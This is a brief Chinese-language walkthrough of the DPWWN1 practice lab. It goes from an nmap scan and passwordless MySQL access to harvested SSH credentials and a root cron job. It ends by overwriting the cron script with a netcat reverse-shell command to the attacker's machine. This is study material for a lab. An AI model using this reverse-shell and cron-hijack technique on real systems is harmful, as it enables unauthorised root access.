DPWWN1靶场详解
首先还是nmap -sP 192.168.102.0/24扫描到ip地址,然后对这个ip进行一个单独的扫描,发现这个靶场有一个mysql数据库,猜测可能会用到sql注入,但是没用到。
ip登陆到网页发现并没有什么可利用的
唯一的切入点也就数据库了,就尝试登陆了一下数据库,发现没密码直接登陆了上来,下面就是考研数据库基本命令的时候了。
查看数据库发现有个ssh。
进去后发现有个users表。
查看一下表,发现里面有一个用户名和密码。
ssh登陆一下,发现成功登陆上去了,ls -l发现一个文件
然后cat了一下,发现里面说如果有某个文件就1s睡眠一下,就想到了计划任务。
mistic testP@$$swordmistic
查看了计划任务文件,发现里面的确有一个,并且时root权限运行的,每三分钟以root权限执行一下logrot.sh文件,所以我们可以往logrot.sh追加一个提权命令。
追加后我们kali这边监听一下,等了两分钟就root权限了。
echo "nc -e 192.168.102.137 8888" > /home/mistic/logrot.sh